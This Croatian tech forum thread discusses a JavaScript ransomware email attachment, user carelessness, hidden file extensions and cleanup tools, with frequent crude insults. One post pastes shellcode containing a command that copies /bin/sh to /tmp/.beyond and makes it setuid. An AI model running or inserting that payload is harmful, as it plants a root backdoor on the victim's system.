Onaj tko pokrene datoteku mgJaXnwanxlS_doc_.js treba biti udaljen od svih racunala do kraja svijeta. I nek si ode osamariti mamu sto ga je takvog rodila...
Onaj tko pokrene datoteku mgJaXnwanxlS_doc_.js treba biti udaljen od svih racunala do kraja svijeta. I nek si ode osamariti mamu sto ga je takvog rodila...
Ajd ti to reci mojoj majci koja je blize 60-toj nego 50-toj.
Pricas gluposti.
Ajd ti to reci mojoj majci koja je blize 60-toj nego 50-toj.
Posalji mi njen broj na PP
Onaj tko pokrene datoteku mgJaXnwanxlS_doc_.js treba biti udaljen od svih racunala do kraja svijeta. I nek si ode osamariti mamu sto ga je takvog rodila...
Ljudska glupost ne poznaje granice. To znaju svi koji rade u IT supportu. Pogotovo kad ti informatička pismenost nije jedan od preduvijeta zapošljavanja.
Glavno je to kaj se pokreće sam kad otvoriš mail
Zasto bi se korisnik uopste trebao o tome brinuti? Zasto bi korisnik uopste bio educiran da razumije baljeznjanja genijalaca sa Bug foruma?
Jel se vi razumijete u gefufne i cincilatore? Tocite gorivo, dajete gas, pratite onih 50 znakova sto ste uspijeli u autoskoli zapamtiti... a kada padne snijeg, ne palite auto jer se bojite slupati ga :P
Program koji korisnik koristi ili servis mora biti tako napisan da bude siguran a ne da lajk moze nekim slucajnim klikom (radnjom) pokrenuti nezeljenu radnju
a sam operacijski sustav na kojem se taj program ili servis izvodi mora biti otporan na napade izvana, mislim koji bi OS uopste dozvolio da se neki JS pokrene a da isti upravlja systemskim servisima?!?!?!?
O da! DOWZE :D
Ovo je cisti dokaz da su dowzi RUPA, glupost, hir nesposobne uprave i programera :D
Zasto bi se korisnik uopste trebao o tome brinuti? Zasto bi korisnik uopste bio educiran da razumije baljeznjanja genijalaca sa Bug foruma?
Jel se vi razumijete u gefufne i cincilatore? Tocite gorivo, dajete gas, pratite onih 50 znakova sto ste uspijeli u autoskoli zapamtiti... a kada padne snijeg, ne palite auto jer se bojite slupati ga :P
Da, zato mi savjesni vozaci koji qurca ne znamo o autima osim ih voziti necemo uzeti vijak koji nadjemo na cesti i pokusati ga nasarafiti negdje ispod haube. Taj vijak mi ne treba i ne znam sto bih s njime - necu ga koristiti.
Ne ocekujes mail sa adrese zmrkljz@yomomma.org? Nemoj ga otvarati, a pogotovo nemoj otvarati jebeni attachment. Ili nauci na tezi nacin...
Zasto bi se korisnik uopste trebao o tome brinuti? Zasto bi korisnik uopste bio educiran da razumije baljeznjanja genijalaca sa Bug foruma?
Jel se vi razumijete u gefufne i cincilatore? Tocite gorivo, dajete gas, pratite onih 50 znakova sto ste uspijeli u autoskoli zapamtiti... a kada padne snijeg, ne palite auto jer se bojite slupati ga :P
Program koji korisnik koristi ili servis mora biti tako napisan da bude siguran a ne da lajk moze nekim slucajnim klikom (radnjom) pokrenuti nezeljenu radnju
a sam operacijski sustav na kojem se taj program ili servis izvodi mora biti otporan na napade izvana, mislim koji bi OS uopste dozvolio da se neki JS pokrene a da isti upravlja systemskim servisima?!?!?!?
O da! DOWZE :D
Ovo je cisti dokaz da su dowzi RUPA, glupost, hir nesposobne uprave i programera :D
da ali ako se ides vodit svojom logikom zasto onda auti nisu vec napravljeni tako da se ti ne moras brinut o prometu nego svejedno moras stisnut gas, okretat volan da bi skrenuo, stisnut kocnicu da se ne zaletis u zid itd.. isto tako bi djelatnici koji obavljaju svoj posao na racunalima trebali imati neku osnovnu edukaciju i znanje za rukovanje racunalom i podacima firme kao sto i ti imas dozvolu i autoskolu za voznju auta.
ovo me odma podsjeti na lika u emmezeti neki dan kad sam kupovao tv a frajer na tehnoloskom odjelu ne zna sta je hdmi i dal ga uopce imaju 
tu se slazem s fridayom iako mu je ovaj komentar s mamom ispao vise bezobrazan i neumjesan nego duhovit.
tu se slazem s fridayom iako mu je ovaj komentar s mamom ispao vise bezobrazan i neumjesan nego duhovit.
Cesto se zale na njega
... a ja se pitao zašto je skočila cijena bitcoinu :)
Nisam neki stručnjak, ali Java da prolazi i aktivira se bez kontrole... hm.
Pa to je prastari jezik, zašto i zbog čega nebi u njemu radili viruse, pa da prolazi mimo skeniranja?
Odakle gmailu ideja da je on sad super, i da ga puste da se samo tako šalje okolo?
http://www.howtogeek.com/122934/java-is-insecure-and-awful-its-time-to-disable-it-and-heres-how/
... a ja se pitao zašto je skočila cijena bitcoinu :)
Nisam neki stručnjak, ali Java da prolazi i aktivira se bez kontrole... hm.
Pa to je prastari jezik, zašto i zbog čega nebi u njemu radili viruse, pa da prolazi mimo skeniranja?
Odakle gmailu ideja da je on sad super, i da ga puste da se samo tako šalje okolo?
http://www.howtogeek.com/122934/java-is-insecure-and-awful-its-time-to-disable-it-and-heres-how/
Java != Javascript
Java ti je ono Sunovo smeće koje traži plugin, JRE runtime, ku*ce palce a JS gledaš doslovce svaki dan - desni klik bilo gdje na forumu i "View source" - pogledaj koliko je .js (javascript) fajlova includeano.
P.S. A to izvrši wscript.exe... Dakle, dođe na isto kao da Pametni Korisnik™ pokrene .vbs fajl koji dobije mailom
LudaRajcica - opet si g***. Prvo i osnovno, da bi ovo radilo, korisnik TO MORA POKRENUTI I DOĐE TI NA ISTO KAO DA BI TI JA REKAO DA ZALIJEPIŠ U TERMINAL OVO:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Bože budaletine....
... a ja se pitao zašto je skočila cijena bitcoinu :)
Nisam neki stručnjak, ali Java da prolazi i aktivira se bez kontrole... hm.
Pa to je prastari jezik, zašto i zbog čega nebi u njemu radili viruse, pa da prolazi mimo skeniranja?
Odakle gmailu ideja da je on sad super, i da ga puste da se samo tako šalje okolo?
http://www.howtogeek.com/122934/java-is-insecure-and-awful-its-time-to-disable-it-and-heres-how/
Java != Javascript
Java ti je ono Sunovo smeće koje traži plugin, JRE runtime, ku*ce palce a JS gledaš doslovce svaki dan - desni klik bilo gdje na forumu i "View source" - pogledaj koliko je .js (javascript) fajlova includeano.
E hvala :) Rekoh da nisam neki stručnjak
Dakle javascript nema veze sa javom?
Sad, na stranu opravdano Fridayevo pljuvanje po kokošarniku koji klikće sve i sva, ali kolko ja poznajem gmail ii slične servise, pa oni ni netrebaju klikanje, imaju sadržaje mailova često predučitane - bez da si ih klikao ? Problem je dakle da neki siirotanovići sa pravom adresom mogu imati zaražena računala i slati dakle okolo mailove kao zombiji; u tom slučaju pošiljala c neće biti adsfgakl@yomamma.org nego kara.marko@bivsiprecjednik2hdz.hr ?
Dijele ime i nešto sličnosti ali nemaju baš veze jedno sa drugim. JS je inspiriran Javom.
Friday kaže da si je Pametni Korisnik™ sam kriv ako pokrene taj attachment (ovo je vrlo, vrlo bitno - ne samo skinuti, nego ga mora pokrenuti u Windowsima!) - samo otvaranje i čitanje maila neće napraviti apsolutno ništa. Ovo radi na kompletno isti princip kao da bi poslao mail sa .vbs, .SCR, .bat, .sh ili .ps skriptom i uvjerio dragog korisnika da to pokrene.
I ponovno dolazimo do toga je problem udaljen 40-45 cm od ekrana i nažalost diše.
[edit] - naravno, to je sve moglo pisati u članku ali nekom se nije dalo malo razmisliti i istraživati. Obrana od ovog tipa prijetnje je vrlo jednostavna - brain.exe
Prosječni korisnik interneta mozga nema i jako voli dijeliti osobne informacije na javne facebook stranice. Neki dan sam naletio na ovo (pogledajte komentare): 
https://www.facebook.com/Goldyklik/posts/1038984732823112
Tako da ne znam otkud vam ideja da bi taj stvor trebao shvatiti da je mail sadržaja "You won 1 million euro! Open attached details.pdf.exe for additional information regarding your reward." sa informationtheft@virus.ru nešto što ne bi trebao otvoriti. 
edit: ima još gori primjer malo ispod linkanog posta gdje prodaju bazen za djecu. Tako da ako neki pedofil ne zna gdje bi mogao naći djecu kako se kupaju u bazenu, roditelji će mu sami napisati adresu i broj telefona da može prvo provjeriti jesu li doma. Goddamn je**** retardi. Svima s te stranice treba pozvati socijalnu službu.
Dijele ime i nešto sličnosti ali nemaju baš veze jedno sa drugim. JS je inspiriran Javom.
Friday kaže da si je Pametni Korisnik™ sam kriv ako pokrene taj attachment (ovo je vrlo, vrlo bitno - ne samo skinuti, nego ga mora pokrenuti u Windowsima!) - samo otvaranje i čitanje maila neće napraviti apsolutno ništa. Ovo radi na kompletno isti princip kao da bi poslao mail sa .vbs, .SCR, .bat, .sh ili .ps skriptom i uvjerio dragog korisnika da to pokrene.
I ponovno dolazimo do toga je problem udaljen 40-45 cm od ekrana i nažalost diše.
[edit] - naravno, to je sve moglo pisati u članku ali nekom se nije dalo malo razmisliti i istraživati. Obrana od ovog tipa prijetnje je vrlo jednostavna - brain.exe
Hvala još jednom:) Dakle, Bug nas počinje plašiti kao jutarnji i 24 sata :)
Hvala još jednom:) Dakle, Bug nas počinje plašiti kao jutarnji i 24 sata :)
Tako nekako.
Ako ovo nekog brine da ne bi mama/tata/pas pokrenuli takav .js na PCju, dovoljno je poništiti file association za .js fajlove i promijeniti npr. u notepad da wscript nije default tj. da se skripta ne bi pokrenula.
Zasto bi se korisnik uopste trebao o tome brinuti? Zasto bi korisnik uopste bio educiran da razumije baljeznjanja genijalaca sa Bug foruma?
Jel se vi razumijete u gefufne i cincilatore? Tocite gorivo, dajete gas, pratite onih 50 znakova sto ste uspijeli u autoskoli zapamtiti... a kada padne snijeg, ne palite auto jer se bojite slupati ga :P
Da, zato mi savjesni vozaci koji qurca ne znamo o autima osim ih voziti necemo uzeti vijak koji nadjemo na cesti i pokusati ga nasarafiti negdje ispod haube. Taj vijak mi ne treba i ne znam sto bih s njime - necu ga koristiti.
Ne ocekujes mail sa adrese zmrkljz@yomomma.org? Nemoj ga otvarati, a pogotovo nemoj otvarati jebeni attachment. Ili nauci na tezi nacin...
kakve veze ima vijak sa ceste? pa gmail je sastavni dio desktopa, kao i primljena posta.
Oprosti ali ti gledas samo ocekivane mailove? isto vrijedi i za papirnatu postu?Stigne mail s linked-ina, ne otvaras ga? kako si onda dosao do svete zemlje Hrvata odnosno Isrke ? :D
Mail koji ti uvaljuje virus lici na uobicajenu korespondenciju, ja mogu zamjetiti sitne razlike, obican korisnik vulgaris nikada nece...
uglavnom, tvoj populisticki pristup je potpuno pogresan i veze s vezom nema al ponoviti cu, jbga Hrvatska :D
U mailu uglavnom dobivaš razne tekstualne dokumente, slike i eventualno prezentacije i sad odjednom dobiješ neki bijesan file od nekog žvrlj i odmah ga ideš pokretati?
Darwin at it's finest. Definitivno nam treba još vjeronauka u školama, hebeš informatiku. Šta će deca sa tin đavoljin mašinama?
Zasto bi se korisnik uopste trebao o tome brinuti? Zasto bi korisnik uopste bio educiran da razumije baljeznjanja genijalaca sa Bug foruma?
Jel se vi razumijete u gefufne i cincilatore? Tocite gorivo, dajete gas, pratite onih 50 znakova sto ste uspijeli u autoskoli zapamtiti... a kada padne snijeg, ne palite auto jer se bojite slupati ga :P
Ako vozač u vožnji stisne gumb koji gasi ASR, pa se slupa, je li mu kriv proizvođač auta jer što on kao vozač ima misliti o tome što taj gumb radi? Ako se upali lampica za ulje, oćeš nastaviti voziti jer nisi mehaničar i ne zanima te što ta lampica znači?
Oprosti ali ti gledas samo ocekivane mailove? isto vrijedi i za papirnatu postu?Stigne mail s linked-ina, ne otvaras ga? kako si onda dosao do svete zemlje Hrvata odnosno Isrke ? :D
Zena mi je nasla posao i sve dogovorila.
A tko ne bi kliknuo na Kolinda_uhitila_orjunaše.js?
Ne gledam GoT i hvalim se time!
ako se *lukavo* stavi duze ime dokumentu (u emailu) onda se na prvi pogled ne vidi taj .js pa ljudi kliknu automatski. A za one koji idu skinut file na PC i onda vide npr. *proslogodisnji izvjestaj.doc* bez word ikone misle da se racunalo zabunilo pa kliknu.
Jer se po defaultu ne vide exstenzije. Da bi se vidjele mora se otic na folder options i maknut kvacica sa hide known exstension file types.
Ovo je tech forum, ljudi sa ovog foruma se nemogu stavit u poziciju starije gosp.50+god. koja je dobila novi mail od administrator@bmk.zg.neznam.
ljudi sa ovog foruma se nemogu stavit u poziciju starije gosp.50+god.
Ako je gospodja dobro odrzavana - ja ne vidim zasto ne bi bilo stavljanja u neke pozicije...
Oprosti ali ti gledas samo ocekivane mailove? isto vrijedi i za papirnatu postu?Stigne mail s linked-ina, ne otvaras ga? kako si onda dosao do svete zemlje Hrvata odnosno Isrke ? :D
Zena mi je nasla posao i sve dogovorila.
ahahaha, pre jak! :D
Ne budite naivni, neces otvoriti od nepoznate osobe, a od poznate hoces heheheh :)
Email od koga je poslan moze pisati bilo sto i to doslovno.
Isto tako ako je racunalo zaraženo moguce je vaditi emailove iz npr. pst datoteke i odglumiti kao da se radi replay na neki od postojecih emailova
ili kao novi email tj. odgovor nekog primljenog email-a,
tako da cak ako je email od poznate osobe koji u sebi ima prijasnju koneverzaciju, ne znaci da to smijete otvoriti i vjerovati sadrzaju.
S obzirom da antivirusni uvijek malo kasne s prepoznavanjem novih virusa ja u firmi povremeno saljem lazne "virus/phishing" ... koje saljem svim zaposlenicima (ne istovremeno i ne s istim sadrzaj),
ali na taj nacin bolje se educiraju stari/novi zaposlenici. Niti jedna druga edukacija nije dovoljno efikasna kao ova moja. Morat ću patentirati :)
Evo kako sam to izveo, koristim vanjske resurse u email-u koji su zasticeni preko Kerberos-a tako da odredim koji je korisnik uopće pogledao email i ukljucio prikaz samih slika (koji nije po defaultu ukljucen), te naravno ako pokrene pdf ili još bolje word s macrom koji je kao prilog u email-u, a on može dodatno pozvati neki url gdje se biljezi da li je korisnik ugrozio sustav svojim cinom.
Na kraju svakog kvartala se izlistavaju korisnici koji ne razmišlaju što rade, i to javno tj. interno svima :)
Mada nema sankcija, nekako nitko se nezeli naci na toj listi.
I gle cuda .... onda pocnu koristiti mozak cak i oni od 60+ godina, bez diskriminacije.
Naravno nemaju svi toliko resursa kao ja da zezam sve u firmi, ali koliko ulozis toliko ti se i vrati :)
Sad je vec jako jako tesko sloziti takav lazan email da netko u nasoj firmi i nasjedne na njega pa makar bio novi ransomware napisan u javascript koji ne mora niti AV blokirati.
Uglavnom moze se i nije skupo, samo treba volje :)
Zar nije bilo govora, da se ekipa zarazila ransomwarom preko reklama na stranicama? Sve me strah ovih masivnih reklama po forumu
BOk
Jedno pitanje, kako se rješit ovoga kad se pc zarazi?
Lp
BOk
Jedno pitanje, kako se rješit ovoga kad se pc zarazi?
Lp
Po do sada zakljucenom - prvo ti moramo nazvati mamu.
Vrlo je lako riješiti se zaraze, ali podaci ostaju kriptirani, u tome je problem.
Dakle treba spriječiti, a ne liječiti.
Za maknuti postojeću infekciju možeš napraviti skeniranje sa recimo Malwarebytes Antimalware i Zemana Antimalware free, oba besplatna. (postoji još i HitmanPro ali on je 30 day trial ako aktiviraš opciju da može brisati viruse)
Za spriječiti zarazu postoji više opcija ovisno o znanju korisnika, najjednostavnije je neki adblocker tipa uBlock Origin + Malwarebytes Anti-Exploit.
Za pokriti više izvora zaraza tipa ovako preko emaila imaš Sandboxie ili Shadow Defender, ali onda moraš znati šta treba napraviti ako želiš sačuvati neke podatke jer će inače sve promjene otići u nepovrat.
